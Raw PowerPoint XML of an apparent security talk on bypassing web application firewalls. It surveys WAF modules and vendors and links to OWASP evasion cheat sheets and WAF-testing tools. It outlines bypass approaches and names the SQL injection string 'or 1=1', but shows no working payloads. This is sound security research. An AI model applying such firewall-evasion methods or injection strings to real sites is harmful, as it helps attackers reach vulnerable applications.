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336" r:id="rId2"/>
    <p:sldId id="331" r:id="rId3"/>
    <p:sldId id="358" r:id="rId4"/>
    <p:sldId id="370" r:id="rId5"/>
    <p:sldId id="385" r:id="rId6"/>
    <p:sldId id="387" r:id="rId7"/>
    <p:sldId id="388" r:id="rId8"/>
    <p:sldId id="361" r:id="rId9"/>
    <p:sldId id="353" r:id="rId10"/>
    <p:sldId id="389" r:id="rId11"/>
    <p:sldId id="390" r:id="rId12"/>
    <p:sldId id="391" r:id="rId13"/>
    <p:sldId id="394" r:id="rId14"/>
    <p:sldId id="352" r:id="rId15"/>
    <p:sldId id="372" r:id="rId16"/>
    <p:sldId id="373" r:id="rId17"/>
    <p:sldId id="386" r:id="rId18"/>
    <p:sldId id="359" r:id="rId19"/>
    <p:sldId id="366" r:id="rId20"/>
    <p:sldId id="367" r:id="rId21"/>
    <p:sldId id="369" r:id="rId22"/>
    <p:sldId id="368" r:id="rId23"/>
    <p:sldId id="362" r:id="rId24"/>
    <p:sldId id="360" r:id="rId25"/>
    <p:sldId id="383" r:id="rId26"/>
    <p:sldId id="384" r:id="rId27"/>
    <p:sldId id="346" r:id="rId28"/>
    <p:sldId id="374" r:id="rId29"/>
    <p:sldId id="354" r:id="rId30"/>
    <p:sldId id="356" r:id="rId31"/>
    <p:sldId id="375" r:id="rId32"/>
    <p:sldId id="377" r:id="rId33"/>
    <p:sldId id="380" r:id="rId34"/>
    <p:sldId id="381" r:id="rId35"/>
    <p:sldId id="382" r:id="rId36"/>
    <p:sldId id="392" r:id="rId37"/>
    <p:sldId id="393" r:id="rId38"/>
    <p:sldId id="395" r:id="rId39"/>
    <p:sldId id="396" r:id="rId40"/>
    <p:sldId id="398" r:id="rId41"/>
    <p:sldId id="376" r:id="rId42"/>
    <p:sldId id="363" r:id="rId43"/>
    <p:sldId id="364" r:id="rId44"/>
    <p:sldId id="397" r:id="rId45"/>
    <p:sldId id="365" r:id="rId46"/>
    <p:sldId id="357" r:id="rId47"/>
    <p:sldId id="371" r:id="rId48"/>
    <p:sldId id="355" r:id="rId49"/>
    <p:sldId id="337" r:id="rId5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  <p15:guide id="9" orient="horz" pos="432">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" orient="horz" pos="4224">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" orient="horz" pos="96">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="3984">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="912">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" pos="3599">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" pos="4079">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="16" pos="31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5B"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="0000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סגנון בהיר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סגנון כה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סגנון ביניים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סגנון ביניים 2 - הדגשה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סגנון ביניים 3 - הדגשה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72" d="100"/>
          <a:sy n="72" d="100"/>
        </p:scale>
        <p:origin x="456" y="52"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3839"/>
        <p:guide orient="horz" pos="432"/>
        <p:guide orient="horz" pos="4224"/>
        <p:guide orient="horz" pos="96"/>
        <p:guide orient="horz" pos="3984"/>
        <p:guide orient="horz" pos="912"/>
        <p:guide pos="3599"/>
        <p:guide pos="4079"/>
        <p:guide pos="31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10/13/2016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10/13/2016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3317-F86E-4970-A577-80FB44ED84F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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8467" y="5943600"/>
            <a:ext cx="12188825" cy="7802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Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"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 userDrawn="1"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013" y="0"/>
            <a:ext cx="1295400" cy="6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A906E-A610-43E9-93EA-D21CD0A1A462}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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4538E-DD97-42F3-9EB6-BF1F919A3405}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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6DD5A-5BC6-419D-91C7-27E35E8B5A4A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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7FBB4-655A-4F14-80A1-DDCDA35FB682}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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A5C3-E6D8-4101-9060-A259A7414FC3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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17C19-B4AA-459C-9324-58408D271C67}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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80F6-2916-4CE5-ACB5-5EC51ACBB7A3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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D1A31-19DA-4A55-BE8C-7EDC81E0C24E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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2812" y="533400"/>
            <a:ext cx="105156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2812" y="1828800"/>
            <a:ext cx="105156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</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>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D8C0AB0-9854-4E22-A420-5E1C1004BF6F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/13/2016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8812" y="6155267"/>
            <a:ext cx="914400" cy="245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waf-research" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tonylturner/WAFlulz" TargetMode="External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khalilbijjou/WAFNinja" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WASC_OWASP_Web_Application_Firewall_Evaluation_Criteria_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EnableSecurity/wafw00f" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/archive/p/w-o-f/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/resources/freeevaluationtool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7/docs/api/java/net/JarURLConnection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sectooladdict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Unwanted Sons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8012" y="4114800"/>
            <a:ext cx="11201400" cy="5623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none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WAF Bypass Methods for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REST of the Top 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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8012" y="4753302"/>
            <a:ext cx="8382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5789612" y="6397221"/>
            <a:ext cx="6248400" cy="30816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none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www.effectivesec.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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08012" y="5181600"/>
            <a:ext cx="3048000" cy="3952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none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Shay Chen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25365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About Us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E:\Proji\wavsep_logo_b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59" y="1075674"/>
            <a:ext cx="3276373" cy="80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52" y="1062396"/>
            <a:ext cx="2749931" cy="8276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932" y="686069"/>
            <a:ext cx="1506160" cy="15237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36839" y="2104072"/>
            <a:ext cx="33640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/>
              <a:t>Attack Vectors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>290+</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0099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64730" y="2104072"/>
            <a:ext cx="3364005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Attack Vectors Covered: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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload Variety: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thousands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Engines Assessed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0099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4015" y="2104072"/>
            <a:ext cx="3275217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Benchmarks Performed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4+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2010, 2011, 2012, 2013/14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack Vectors Covered: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10+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload Variety: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thousands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Engines Assessed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0099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27012" y="990600"/>
            <a:ext cx="11783664" cy="2743200"/>
            <a:chOff x="227012" y="990600"/>
            <a:chExt cx="11783664" cy="245937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227012" y="990600"/>
              <a:ext cx="0" cy="245937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154900" y="990600"/>
              <a:ext cx="0" cy="245937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82788" y="990600"/>
              <a:ext cx="0" cy="245937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2010676" y="990600"/>
              <a:ext cx="0" cy="245937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1061210" y="3962400"/>
            <a:ext cx="4904136" cy="2057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29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166678" y="3962400"/>
            <a:ext cx="4904136" cy="2057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1232" y="4685722"/>
            <a:ext cx="1714500" cy="5810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2315" y="4690555"/>
            <a:ext cx="2076450" cy="600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9431" y="4087388"/>
            <a:ext cx="2351806" cy="1636419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:reflection blurRad="63500" stA="90000" endPos="20000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="perspectiveLeft"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene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9096" y="4091791"/>
            <a:ext cx="2343254" cy="1627612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:reflection blurRad="63500" stA="90000" endPos="20000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/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6993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What’s The Point ?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Overview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Insights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Future Predictions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What’s Missing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Methodologies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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WAF Bypass Methods for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of the TOP 10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Bypass Black-list Validation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Abuse Permissive White List Validation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Target Insufficiently Protected Entry Points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Tools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WAFEP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61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1370012" y="1676400"/>
            <a:ext cx="9372600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="0" dirty="0" smtClean="0"/>
              <a:t>WAF / IPS / Security Filter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000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761" y="2514600"/>
            <a:ext cx="9789102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6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WAF - What Does It Do ?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Purpose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Identification of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks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Identification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of Known </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application/Web-Server Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits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Relevant For - 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Support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTPs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Support In Development)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Inspection of Both Input and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some WAFs Also Support -</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Identification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of Automated Scanning Engines and Abnormal Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Patterns/Abuse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Virtual Patching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- External </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigation of Application Level Flaws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5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Attack Mitigation Perquisites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Attack Mitigation Perquisites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0">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Mitigate SPECIFIC Attacks, the WAF must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Support The Protocol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HTTP / HTTPS / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etc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Parse the Input Structure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GET / POST/ JSON / XML / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etc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Identify the Attack Pattern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Include Signatures or Behavior Patterns for the RELEVANT ATTACK SIGNATURES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 marL="364490" lvl="1" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="364490" lvl="1" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/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PREVENT THE ATTACK USING COMPLEMENTARY MECHANISMS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99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WAF Challenges in the Modern Age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WAF Modules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1217612" y="838200"/>
            <a:ext cx="9601200" cy="762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Common WAF Modules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217612" y="838200"/>
            <a:ext cx="685800" cy="762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1210380" y="838200"/>
            <a:ext cx="67892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#</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="4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217612" y="1676400"/>
            <a:ext cx="96012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 smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protocol Structure Enforcement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217612" y="2202359"/>
            <a:ext cx="96012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 smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Negative Security - Black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>List / Signature-Based Attack Detection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217612" y="2721109"/>
            <a:ext cx="96012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 smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Positive Security - White </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>List / Schemed-Based Enforcement (Auto-Learned / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manual)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217612" y="3231470"/>
            <a:ext cx="96012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 smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anti-Automation Mechanisms (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Challenges / CAPTCHAs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)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17612" y="3733800"/>
            <a:ext cx="9601200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000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP Reputation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Calibri" panose="020F050202020403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1217612" y="4343400"/>
            <a:ext cx="96012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modsecur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2" y="4480690"/>
            <a:ext cx="2209800" cy="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ironb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4487157"/>
            <a:ext cx="1828800" cy="5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ebKnight Ba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701" y="4417199"/>
            <a:ext cx="3001911" cy="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imperv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5219700"/>
            <a:ext cx="2764462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f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11" y="5105400"/>
            <a:ext cx="679422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radwa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037" y="5162777"/>
            <a:ext cx="2612257" cy="43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incapsul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553" y="5719689"/>
            <a:ext cx="1762125" cy="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Image result for cloudflar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01" y="5715000"/>
            <a:ext cx="2943225" cy="49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f5 silverlin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7" y="5686426"/>
            <a:ext cx="21050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Image result for barracuda networks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627" y="5066804"/>
            <a:ext cx="2269471" cy="58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0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Negative Security Modules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0">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Negative Security – Signature Based Detection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Input Normalization (Delimiter/Whitespace Stripping, Restrictions..)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Attack Signature Detection via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Identification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External Addition of Headers / Restrictions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&quot;or 1=1&quot; pay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2" y="3357459"/>
            <a:ext cx="5410200" cy="278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1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Positive Security Modules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0">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Positive Security – Valid Structure Enforcement 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Heuristic Learning Mode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Input Schema Per Parameter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Restricted URLs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Access Sequences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3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Positive Security Modules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0">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti Automation – Bot Detection / Mass Fraud Detection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</a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Challenges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CAPTCHA Challenges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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Communication Challenges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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etc</a:t>
            </a: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6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Positive Security Modules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0">
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP Reputation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IP Origin Rulesets (TOR / Prohibited Countries / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etc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Known Attack Origin IPs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Covert Users in VPNs/TOR/Anonymous Proxies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0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70612" y="838200"/>
            <a:ext cx="4876800" cy="762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ts val="2100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Technology Trends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Pillars of Modern Applications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836612" y="838200"/>
            <a:ext cx="4876800" cy="762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Development Trends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836612" y="838200"/>
            <a:ext cx="685800" cy="762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829380" y="838200"/>
            <a:ext cx="67892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endParaRPr lang="he-IL" sz="4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180930" y="838200"/>
            <a:ext cx="67892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he-IL" sz="4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174051" y="830759"/>
            <a:ext cx="685800" cy="776882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF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Rectangle 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836612" y="1600200"/>
            <a:ext cx="4876800" cy="4634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Continuous Integration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36612" y="2063688"/>
            <a:ext cx="4876800" cy="463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Rush to Production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180012" y="1600200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0" name="Down Arrow 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180012" y="2063688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3" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621802" y="432212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AngularJS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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852406" y="432212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React</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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083009" y="432212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Meteor.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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313612" y="432212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Ember.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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621802" y="4837175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Bootstrap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4852405" y="4837175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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Foundation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204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083009" y="4837175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Polymer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313612" y="4837175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latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cordova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621802" y="535223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JQuery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852406" y="535223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Backbone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083009" y="535223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MooTools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313612" y="5352230"/>
            <a:ext cx="1187989" cy="457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Prototype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170612" y="1600200"/>
            <a:ext cx="4876800" cy="4634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Single Page Applications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70612" y="2063688"/>
            <a:ext cx="4876800" cy="463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Responsive Design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170612" y="2527176"/>
            <a:ext cx="4876800" cy="4634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REST Service Oriented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6170612" y="2990664"/>
            <a:ext cx="4876800" cy="463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JSON/XML/Sockets/Exotic Vectors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16" name="Straight Connector 115"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
